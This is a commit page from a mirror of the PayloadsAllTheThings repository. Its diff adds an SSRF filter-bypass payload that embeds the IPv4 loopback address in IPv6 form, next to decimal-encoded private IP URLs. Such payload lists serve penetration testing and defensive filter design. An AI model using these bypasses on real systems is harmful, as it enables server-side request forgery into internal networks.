mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings
This commit is contained in:
commit
b8e74fe0ba
@ -123,6 +123,12 @@ http://3232235521/ = http://192.168.0.1
|
||||
http://3232235777/ = http://192.168.1.1
|
||||
```
|
||||
|
||||
Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
|
||||
|
||||
```powershell
|
||||
http://[0:0:0:0:0:ffff:127.0.0.1]
|
||||
```
|
||||
|
||||
Bypass using malformed urls
|
||||
|
||||
```powershell
|
||||
|
Loading…
Reference in New Issue
Block a user